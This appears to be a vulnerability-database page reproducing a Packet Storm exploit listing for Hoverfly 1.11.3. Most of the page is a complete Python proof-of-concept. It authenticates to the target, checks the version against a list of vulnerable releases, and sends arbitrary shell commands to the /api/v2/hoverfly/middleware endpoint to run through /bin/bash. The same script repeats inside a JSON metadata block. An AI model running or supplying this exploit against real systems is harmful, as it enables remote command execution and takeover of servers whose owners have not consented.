📄 Hoverfly 1.11.3 Remote Command Execution_PACKETSTORM:219682

Description

This Python script is an exploitation tool targeting a vulnerable Hoverfly API endpoint, specifically the /api/v2/hoverfly/middleware functionality, which allows execution of user-supplied input through a backend binary...

Visit Original Source

Basic Information

ID PACKETSTORM:219682

Published Apr 23, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : Hoverfly 1.11.3 Middleware API Authenticated RCE Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://hoverfly.io/ |
==================================================================================================================================

[+] Summary : This Python script is an exploitation tool targeting a vulnerable Hoverfly API endpoint, specifically the /api/v2/hoverfly/middleware functionality,
which allows execution of user-supplied input through a backend binary.

[+] POC :

#!/usr/bin/env python3

import requests
import sys
import re
import json
import time
import signal
from urllib.parse import urljoin

class Colors:
GREEN = '\033[0;32m'
RED = '\033[0;31m'
BLUE = '\033[0;34m'
YELLOW = '\033[0;33m'
PURPLE = '\033[0;35m'
CYAN = '\033[0;36m'
END = '\033[0m'

def signal_handler(sig, frame):
print(f"\n\n{Colors.RED}[!] Exiting...{Colors.END}")
sys.exit(1)

signal.signal(signal.SIGINT, signal_handler)

def help_panel():
print(f"{Colors.YELLOW}")
print("Usage: python3 script.py -t http://target.com:8888 -u <user> -p <password> -c \"<command>\"")
print(f"{Colors.END}")

def is_reachable(target):
try:
response = requests.get(target, timeout=10, verify=False)
if 200 <= response.status_code < 500:
print(f"{Colors.GREEN}[OK] Target is reachable.{Colors.END}\n")
return True
else:
print(f"{Colors.RED}[FAIL] Target unreachable.{Colors.END}")
return False
except requests.RequestException:
print(f"{Colors.RED}[FAIL] Target unreachable.{Colors.END}")
return False

def get_token(target, username, password):
print(f"{Colors.CYAN}[STEP] Requesting authentication token...{Colors.END}")
try:
response = requests.post(
f"{target}/api/token-auth",
headers={"Content-Type": "application/json"},
json={"username": username, "password": password},
timeout=10,
verify=False
)

if response.status_code == 200:
try:
token = response.json().get("token")
if token:
print(f"{Colors.GREEN}[OK] Token acquired successfully.{Colors.END}")
return token
except json.JSONDecodeError:
return None
except requests.RequestException:
pass

return None

def get_version(target, token):
print(f"\n{Colors.CYAN}[STEP] Retrieving Hoverfly version...{Colors.END}")
try:
response = requests.get(
f"{target}/api/v2/hoverfly/version",
headers={"Authorization": f"Bearer {token}"},
timeout=10,
verify=False
)

if response.status_code == 200:
try:
version = response.json().get("version", "")
if version:
version = version.replace('v', '')
print(f"{Colors.BLUE}[INFO] Detected version: {Colors.YELLOW}v{version}{Colors.END}\n")
return version
except json.JSONDecodeError:
return None
except requests.RequestException:
pass

return None

def is_vulnerable(version):
print(f"{Colors.CYAN}[STEP] Checking if target version is vulnerable...{Colors.END}")
vulnerable_versions = [
"1.11.3", "1.11.2", "1.11.1", "1.11.0",
"1.10.13", "1.10.12", "1.10.11", "1.10.10"
]

if version and version in vulnerable_versions:
print(f"{Colors.GREEN}[OK] Vulnerable version detected: {Colors.RED}{version}{Colors.END}")
return True

print(f"{Colors.RED}[FAIL] Target is not vulnerable.{Colors.END}")
return False

def exploit(target, token, command):
print(f"\n{Colors.CYAN}[STEP] Attempting command execution...{Colors.END}")

try:
response = requests.put(
f"{target}/api/v2/hoverfly/middleware",
headers={"Authorization": f"Bearer {token}"},
json={"binary": "/bin/bash", "script": command},
timeout=10,
verify=False
)

if response.status_code == 200:
response_text = response.text.replace('\\n', '\n')

try:
data = response.json()
output = data.get('output')
if output:
print(f"{Colors.GREEN}[OK] Command executed successfully.{Colors.END}")
print(f"{Colors.PURPLE}{output}{Colors.END}")
return True
except json.JSONDecodeError:
pass

match = re.search(r'STDOUT:(.*?)(?:STDERR:|$)', response_text, re.DOTALL)
if match:
output = match.group(1).strip()
print(f"{Colors.GREEN}[OK] Command executed successfully.{Colors.END}")
print(f"{Colors.PURPLE}{output}{Colors.END}")
return True

print(f"{Colors.YELLOW}[WARN] No output received.{Colors.END}")
return True

print(f"{Colors.RED}[FAIL] Request failed: {response.status_code}{Colors.END}")
return False

except requests.RequestException as e:
print(f"{Colors.RED}[ERROR] {e}{Colors.END}")
return False

def main():
import argparse

parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('-t', '--target')
parser.add_argument('-c', '--command')
parser.add_argument('-u', '--username')
parser.add_argument('-p', '--password')
parser.add_argument('-h', '--help', action='store_true')

args = parser.parse_args()

if args.help or not all([args.target, args.command, args.username, args.password]):
help_panel()
sys.exit(1)

target = args.target.rstrip('/')

import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

print('\033[?25l', end='')

try:
print(f"{Colors.YELLOW}=== START ==={Colors.END}")

if not is_reachable(target):
sys.exit(1)

token = get_token(target, args.username, args.password)
if not token:
print(f"{Colors.RED}[-] Auth failed{Colors.END}")
sys.exit(1)

version = get_version(target, token)
if not version or not is_vulnerable(version):
sys.exit(1)

exploit(target, token, args.command)

print(f"{Colors.YELLOW}=== END ==={Colors.END}")

finally:
print('\033[?25h', end='')

if __name__ == "__main__":
main()

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-04-23T16:45:57",
    "description": "This Python script is an exploitation tool targeting a vulnerable Hoverfly API endpoint, specifically the /api/v2/hoverfly/middleware functionality, which allows execution of user-supplied input through a backend binary...",
    "published": "2026-04-23T00:00:00",
    "modified": "2026-04-23T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Hoverfly 1.11.3 Remote Command Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:219682",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "==================================================================================================================================\n    | # Title     : Hoverfly 1.11.3 Middleware API Authenticated RCE Exploit                                                         |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://hoverfly.io/                                                                                             |\n    ==================================================================================================================================\n    \n    [+] Summary    : This Python script is an exploitation tool targeting a vulnerable Hoverfly API endpoint, specifically the /api/v2/hoverfly/middleware functionality, \n                     which allows execution of user-supplied input through a backend binary.\n    \n    [+] POC        :  \n    \n    #!/usr/bin/env python3\n    \n    import requests\n    import sys\n    import re\n    import json\n    import time\n    import signal\n    from urllib.parse import urljoin\n    \n    class Colors:\n        GREEN = '\\033[0;32m'\n        RED = '\\033[0;31m'\n        BLUE = '\\033[0;34m'\n        YELLOW = '\\033[0;33m'\n        PURPLE = '\\033[0;35m'\n        CYAN = '\\033[0;36m'\n        END = '\\033[0m'\n    \n    def signal_handler(sig, frame):\n        print(f\"\\n\\n{Colors.RED}[!] Exiting...{Colors.END}\")\n        sys.exit(1)\n    \n    signal.signal(signal.SIGINT, signal_handler)\n    \n    def help_panel():\n        print(f\"{Colors.YELLOW}\")\n        print(\"Usage: python3 script.py -t http://target.com:8888 -u <user> -p <password> -c \\\"<command>\\\"\")\n        print(f\"{Colors.END}\")\n    \n    def is_reachable(target):\n        try:\n            response = requests.get(target, timeout=10, verify=False)\n            if 200 <= response.status_code < 500:\n                print(f\"{Colors.GREEN}[OK] Target is reachable.{Colors.END}\\n\")\n                return True\n            else:\n                print(f\"{Colors.RED}[FAIL] Target unreachable.{Colors.END}\")\n                return False\n        except requests.RequestException:\n            print(f\"{Colors.RED}[FAIL] Target unreachable.{Colors.END}\")\n            return False\n    \n    def get_token(target, username, password):\n        print(f\"{Colors.CYAN}[STEP] Requesting authentication token...{Colors.END}\")\n        try:\n            response = requests.post(\n                f\"{target}/api/token-auth\",\n                headers={\"Content-Type\": \"application/json\"},\n                json={\"username\": username, \"password\": password},\n                timeout=10,\n                verify=False\n            )\n            \n            if response.status_code == 200:\n                try:\n                    token = response.json().get(\"token\")\n                    if token:\n                        print(f\"{Colors.GREEN}[OK] Token acquired successfully.{Colors.END}\")\n                        return token\n                except json.JSONDecodeError:\n                    return None\n        except requests.RequestException:\n            pass\n        \n        return None\n    \n    def get_version(target, token):\n        print(f\"\\n{Colors.CYAN}[STEP] Retrieving Hoverfly version...{Colors.END}\")\n        try:\n            response = requests.get(\n                f\"{target}/api/v2/hoverfly/version\",\n                headers={\"Authorization\": f\"Bearer {token}\"},\n                timeout=10,\n                verify=False\n            )\n            \n            if response.status_code == 200:\n                try:\n                    version = response.json().get(\"version\", \"\")\n                    if version:\n                        version = version.replace('v', '')\n                        print(f\"{Colors.BLUE}[INFO] Detected version: {Colors.YELLOW}v{version}{Colors.END}\\n\")\n                        return version\n                except json.JSONDecodeError:\n                    return None\n        except requests.RequestException:\n            pass\n        \n        return None\n    \n    def is_vulnerable(version):\n        print(f\"{Colors.CYAN}[STEP] Checking if target version is vulnerable...{Colors.END}\")\n        vulnerable_versions = [\n            \"1.11.3\", \"1.11.2\", \"1.11.1\", \"1.11.0\",\n            \"1.10.13\", \"1.10.12\", \"1.10.11\", \"1.10.10\"\n        ]\n        \n        if version and version in vulnerable_versions:\n            print(f\"{Colors.GREEN}[OK] Vulnerable version detected: {Colors.RED}{version}{Colors.END}\")\n            return True\n        \n        print(f\"{Colors.RED}[FAIL] Target is not vulnerable.{Colors.END}\")\n        return False\n    \n    def exploit(target, token, command):\n        print(f\"\\n{Colors.CYAN}[STEP] Attempting command execution...{Colors.END}\")\n        \n        try:\n            response = requests.put(\n                f\"{target}/api/v2/hoverfly/middleware\",\n                headers={\"Authorization\": f\"Bearer {token}\"},\n                json={\"binary\": \"/bin/bash\", \"script\": command},\n                timeout=10,\n                verify=False\n            )\n            \n            if response.status_code == 200:\n                response_text = response.text.replace('\\\\n', '\\n')\n                \n                try:\n                    data = response.json()\n                    output = data.get('output')\n                    if output:\n                        print(f\"{Colors.GREEN}[OK] Command executed successfully.{Colors.END}\")\n                        print(f\"{Colors.PURPLE}{output}{Colors.END}\")\n                        return True\n                except json.JSONDecodeError:\n                    pass\n    \n                match = re.search(r'STDOUT:(.*?)(?:STDERR:|$)', response_text, re.DOTALL)\n                if match:\n                    output = match.group(1).strip()\n                    print(f\"{Colors.GREEN}[OK] Command executed successfully.{Colors.END}\")\n                    print(f\"{Colors.PURPLE}{output}{Colors.END}\")\n                    return True\n    \n                print(f\"{Colors.YELLOW}[WARN] No output received.{Colors.END}\")\n                return True\n    \n            print(f\"{Colors.RED}[FAIL] Request failed: {response.status_code}{Colors.END}\")\n            return False\n    \n        except requests.RequestException as e:\n            print(f\"{Colors.RED}[ERROR] {e}{Colors.END}\")\n            return False\n    \n    def main():\n        import argparse\n        \n        parser = argparse.ArgumentParser(add_help=False)\n        parser.add_argument('-t', '--target')\n        parser.add_argument('-c', '--command')\n        parser.add_argument('-u', '--username')\n        parser.add_argument('-p', '--password')\n        parser.add_argument('-h', '--help', action='store_true')\n        \n        args = parser.parse_args()\n        \n        if args.help or not all([args.target, args.command, args.username, args.password]):\n            help_panel()\n            sys.exit(1)\n        \n        target = args.target.rstrip('/')\n        \n        import urllib3\n        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n        \n        print('\\033[?25l', end='')\n    \n        try:\n            print(f\"{Colors.YELLOW}=== START ==={Colors.END}\")\n            \n            if not is_reachable(target):\n                sys.exit(1)\n    \n            token = get_token(target, args.username, args.password)\n            if not token:\n                print(f\"{Colors.RED}[-] Auth failed{Colors.END}\")\n                sys.exit(1)\n    \n            version = get_version(target, token)\n            if not version or not is_vulnerable(version):\n                sys.exit(1)\n    \n            exploit(target, token, args.command)\n    \n            print(f\"{Colors.YELLOW}=== END ==={Colors.END}\")\n    \n        finally:\n            print('\\033[?25h', end='')\n    \n    if __name__ == \"__main__\":\n        main()\n    \t\n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/219682",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/219682/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply